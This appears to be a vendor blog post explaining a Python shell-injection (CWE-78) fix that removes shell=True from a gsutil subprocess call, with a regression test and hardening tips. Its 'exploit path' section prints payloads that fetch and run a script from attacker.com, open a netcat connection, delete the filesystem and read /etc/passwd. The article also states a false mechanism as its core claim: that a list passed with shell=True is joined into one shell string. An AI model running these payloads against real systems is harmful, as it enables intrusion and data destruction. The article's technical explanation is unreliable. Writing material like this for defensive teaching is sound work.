What is shell command injection in Python subprocess?

It occurs when subprocess is called with shell=True and a user-controlled string, causing the shell to interpret metacharacters like ;, &&, and $() as commands rather than literal text.

How do you prevent shell injection in Python subprocess?

Always use shell=False (the default) and pass arguments as a list. This ensures each element is treated as a literal argument, never parsed by a shell.

What CWE is shell command injection?

CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection").

Is input validation enough to prevent shell injection in Python?

No. Input validation can help, but the most robust fix is to avoid shell=True entirely. Allowlists and sanitization can be bypassed; shell=False with a list argument is the definitive solution.

Can static analysis detect shell=True subprocess calls?

Yes. Tools like Semgrep, Bandit, and multi-agent AI scanners can flag subprocess calls using shell=True with variable arguments as high-risk patterns.

How command injection happens in Python subprocess and how to fix it

Summary

A critical shell injection vulnerability was discovered in utils/downloads.py where subprocess.check_output was called with shell=True while passing a user-controlled URL parameter. This allowed attackers to inject arbitrary shell commands by embedding metacharacters like ;, &&, or $(...) into a URL string. The fix removes shell=True, ensuring the URL is passed as a literal argument in a list rather than being interpreted by the shell.

Quick Answer: This is a shell command injection vulnerability (CWE-78) in Python's subprocess.check_output() inside gsutil_getsize() in utils/downloads.py. Using shell=True with a user-controlled URL causes Python to pass the entire argument list as a shell command string, where metacharacters are interpreted. The fix: remove shell=True so the URL is treated as a literal list element.

Introduction

The utils/downloads.py file handles downloading and sizing objects from Google Cloud Storage using the gsutil command-line tool. Inside the gsutil_getsize() function, around line 29, a call to subprocess.check_output was made with shell=True — and the URL being queried was passed directly as part of the argument list. That single keyword argument, shell=True, turned a routine file-size check into a critical remote code execution vector.

This is a pattern that appears deceptively safe at first glance: the code passes a list to subprocess.check_output, which looks structured and controlled. But shell=True changes everything about how Python handles that list.

The Vulnerability Explained

What `shell=True` actually does with a list

When you call subprocess.check_output with a list and shell=True, Python doesn't treat the list as a structured argument array. Instead, it joins the list into a single string and hands it to /bin/sh -c. That means:

# What the code did (VULNERABLE)
url = "gs://bucket/myfile"
subprocess.check_output(["gsutil", "du", url], shell=True, encoding="utf-8")

...gets executed by the shell as:

/bin/sh -c "gsutil du gs://bucket/myfile"

The shell parses the entire string, including any metacharacters embedded in url. If an attacker controls that URL — whether through user input, a configuration file, an API response, or an environment variable — they can inject arbitrary commands.

The specific exploit path

Consider what happens when url contains shell metacharacters:

# Attacker-controlled URL
url = "gs://bucket$(curl http://attacker.com/shell.sh | bash)"

# Resulting shell command:
# gsutil du gs://bucket$(curl http://attacker.com/shell.sh | bash)
# The $(...) subshell executes curl and pipes to bash

Or even simpler:

url = "gs://bucket/file; rm -rf /"
# Shell executes: gsutil du gs://bucket/file
# Then:           rm -rf /

The regression test suite included in this fix documents 27 distinct payload patterns that exploit this, including:

Semicolon chaining: gs://bucket/file; cat /etc/passwd
Subshell execution: gs://bucket/file$(id)
Backtick execution: gs://bucket/file`whoami`
Pipe injection: gs://bucket/file | nc attacker.com 4444
Newline injection: gs://bucket/file\nrm -rf /
Redirection: gs://bucket/file > /etc/crontab

Why this is critical for a Python library

The PR description highlights a key threat model detail: this is a Python library. Any application that imports utils/downloads.py and passes URLs from user input, configuration, or external APIs into gsutil_getsize() is directly exposed. The vulnerability doesn't require the library itself to accept HTTP requests — it just needs the calling application to pass a URL that isn't fully hardcoded.

The Fix

The fix is surgical and precise: remove shell=True.

Before (vulnerable)

# utils/downloads.py:29 — BEFORE
result = subprocess.check_output(
    ["gsutil", "du", url],
    shell=True,
    encoding="utf-8"
)

After (fixed)

# utils/downloads.py:29 — AFTER
result = subprocess.check_output(
    ["gsutil", "du", url],
    encoding="utf-8"
)

shell defaults to False when omitted. With shell=False, Python uses the execvp family of system calls directly — it passes each list element as a separate, literal argument to the gsutil process. The operating system never involves a shell, so there is no shell to interpret metacharacters.

When url is "gs://bucket/file; rm -rf /", the gsutil process receives exactly three arguments:

gsutil
du
gs://bucket/file; rm -rf /

The semicolons, pipes, and dollar signs are just characters in a string — gsutil will reject the malformed URL and return an error, but no shell command is ever executed.

The regression test

A new test file, tests/test_invariant_downloads.py, was added to guard against this vulnerability being reintroduced. It patches subprocess.check_output at the I/O boundary and verifies two invariants for every adversarial payload:

# From tests/test_invariant_downloads.py
@pytest.mark.parametrize("payload", ADVERSARIAL_PAYLOADS)
def test_gsutil_getsize_no_shell_injection(payload):
    mock_output = "1024  gs://bucket/file\n"

    with patch("utils.downloads.subprocess.check_output", return_value=mock_output) as mock_check:
        result = gsutil_getsize(payload)

        mock_check.assert_called_once()
        call_args, call_kwargs = mock_check.call_args

        # Invariant 1: shell=True must never be used
        assert call_kwargs.get("shell", False) is False, (
            f"SECURITY VIOLATION: gsutil_getsize() called subprocess with shell=True "
            f"for payload {payload!r}."
        )

        # Invariant 2: args must be a list/tuple, not a string
        assert isinstance(call_args[0], (list, tuple)), (
            f"subprocess args must be a list/tuple, got {type(call_args[0])}"
        )

This test exercises the real gsutil_getsize() code path — only the subprocess I/O is mocked, so all argument construction logic runs under test. If a future developer reintroduces shell=True, the test suite will catch it immediately.

Prevention & Best Practices

1. Never use `shell=True` with variable input

The Python documentation itself warns: "Using shell=True can be a security hazard." The rule of thumb is simple:

✅ subprocess.run(["cmd", variable_arg], shell=False) — safe
❌ subprocess.run(f"cmd {variable_arg}", shell=True) — dangerous
❌ subprocess.run(["cmd", variable_arg], shell=True) — also dangerous (list is joined)

2. If you must use a shell, use `shlex.quote()`

In rare cases where shell features are genuinely needed (e.g., glob expansion, shell built-ins), sanitize every variable with shlex.quote():

import shlex
import subprocess

safe_url = shlex.quote(url)
subprocess.check_output(f"gsutil du {safe_url}", shell=True, encoding="utf-8")

shlex.quote() wraps the value in single quotes and escapes any embedded single quotes, preventing shell interpretation. That said, the preferred approach is always shell=False with a list.

3. Use static analysis tools

Several tools can catch this pattern automatically:

Bandit (B603, B602): Flags subprocess calls with shell=True
Semgrep: Rules for subprocess-shell-true and dangerous-subprocess-use
PyLint: W1510 warns on subprocess calls with shell=True

Add these to your CI pipeline to catch regressions before they reach production.

4. Apply the principle of least privilege

Even with shell=False, consider whether the process running gsutil needs full filesystem access. Running download utilities in a restricted environment (containers, reduced IAM roles, seccomp profiles) limits blast radius if another vulnerability is found.

5. Validate URL schemas

For gsutil specifically, consider validating that the URL starts with gs:// and matches an expected pattern before passing it to subprocess:

import re

GCS_URL_PATTERN = re.compile(r'^gs://[a-z0-9][a-z0-9._-]{1,61}[a-z0-9]/[\w./-]*$')

def gsutil_getsize(url: str) -> int:
    if not GCS_URL_PATTERN.match(url):
        raise ValueError(f"Invalid GCS URL: {url!r}")
    return subprocess.check_output(["gsutil", "du", url], encoding="utf-8")

This is defense-in-depth — it doesn't replace shell=False, but it adds an additional layer.

Key Takeaways

shell=True with a list argument is not safer than shell=True with a string — Python joins the list before passing to /bin/sh, so metacharacters in any element are still interpreted.
The fix in utils/downloads.py is one keyword argument — removing shell=True from the subprocess.check_output call in gsutil_getsize() is sufficient to eliminate the injection vector entirely.
Library code is higher risk — because utils/downloads.py is imported by other applications, a vulnerability here multiplies across every application that calls gsutil_getsize() with external input.
Regression tests should verify subprocess call signatures, not just return values — the new test_invariant_downloads.py checks call_kwargs.get("shell", False) directly, making it impossible for this pattern to silently reappear.
27 distinct payload patterns bypass naive sanitization — newlines, null bytes, percent-encoding, and nested subshells all work around simple blocklists; structural fixes (shell=False) are the only reliable defense.

How Orbis AppSec Detected This

Source: The url parameter passed into gsutil_getsize() in utils/downloads.py, which can be derived from user input, configuration files, or external API responses.
Sink: subprocess.check_output(["gsutil", "du", url], shell=True, encoding="utf-8") at utils/downloads.py:29 — the shell=True keyword causes the OS shell to interpret the URL as a command string.
Missing control: No validation that url is free of shell metacharacters, and no use of shell=False to prevent shell interpretation of the argument list.
CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection").
Fix: Removed shell=True from the subprocess.check_output call so the URL is passed as a literal argument element via execvp, bypassing the shell entirely.

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.

Conclusion

The vulnerability in utils/downloads.py is a textbook example of how a single keyword argument can turn a routine system call into a critical security flaw. The shell=True parameter in subprocess.check_output is one of Python's most dangerous footguns — it silently changes the execution model from structured argument passing to full shell interpretation, and it does so even when you pass a list instead of a string.

The fix is minimal, the security gain is maximal, and the regression tests ensure the property holds permanently. If you're using subprocess anywhere in your codebase, audit every call site for shell=True — especially anywhere that touches external input. It's a one-word change with critical consequences either way.

cwe	CWE-78
fix	Remove shell=True so the URL is passed as a literal list argument, never interpreted by the shell
risk	Arbitrary OS command execution with application privileges
language	Python
root cause	subprocess.check_output called with shell=True and a user-controlled URL argument
vulnerability	Shell Command Injection via subprocess shell=True

How command injection happens in Python subprocess and how to fix it

Answer Summary

Vulnerability at a Glance

How command injection happens in Python subprocess and how to fix it

Summary

Introduction

The Vulnerability Explained

What `shell=True` actually does with a list

The specific exploit path

Why this is critical for a Python library

The Fix

Before (vulnerable)

After (fixed)

The regression test

Prevention & Best Practices

1. Never use `shell=True` with variable input

2. If you must use a shell, use `shlex.quote()`

3. Use static analysis tools

4. Apply the principle of least privilege

5. Validate URL schemas

Key Takeaways

How Orbis AppSec Detected This

Conclusion

References

Frequently Asked Questions

What is shell command injection in Python subprocess?

How do you prevent shell injection in Python subprocess?

What CWE is shell command injection?

Is input validation enough to prevent shell injection in Python?

Can static analysis detect shell=True subprocess calls?

View the Security Fix

Related Articles

How arbitrary code execution via injected protobuf definition type fields happens in Node.js and how to fix it

How command injection happens in Node.js child_process and how to fix it

How unsafe pickle deserialization happens in NumPy's np.load() and how to fix it

How SSRF and Credential Leakage via Absolute URLs happens in axios and how to fix it

How pickle-based arbitrary code execution happens in PyTorch and how to fix it

How WebSocket protocol length header abuse happens in Node.js and how to fix it

How command injection happens in Python subprocess and how to fix it

Answer Summary

Vulnerability at a Glance

How command injection happens in Python subprocess and how to fix it

Summary

Introduction

The Vulnerability Explained

What shell=True actually does with a list

The specific exploit path

Why this is critical for a Python library

The Fix

Before (vulnerable)

After (fixed)

The regression test

Prevention & Best Practices

1. Never use shell=True with variable input

2. If you must use a shell, use shlex.quote()

3. Use static analysis tools

4. Apply the principle of least privilege

5. Validate URL schemas

Key Takeaways

How Orbis AppSec Detected This

Conclusion

References

Frequently Asked Questions

What is shell command injection in Python subprocess?

How do you prevent shell injection in Python subprocess?

What CWE is shell command injection?

Is input validation enough to prevent shell injection in Python?

Can static analysis detect shell=True subprocess calls?

View the Security Fix

Related Articles

How arbitrary code execution via injected protobuf definition type fields happens in Node.js and how to fix it

How command injection happens in Node.js child_process and how to fix it

How unsafe pickle deserialization happens in NumPy's np.load() and how to fix it

How SSRF and Credential Leakage via Absolute URLs happens in axios and how to fix it

How pickle-based arbitrary code execution happens in PyTorch and how to fix it

How WebSocket protocol length header abuse happens in Node.js and how to fix it

What `shell=True` actually does with a list

1. Never use `shell=True` with variable input

2. If you must use a shell, use `shlex.quote()`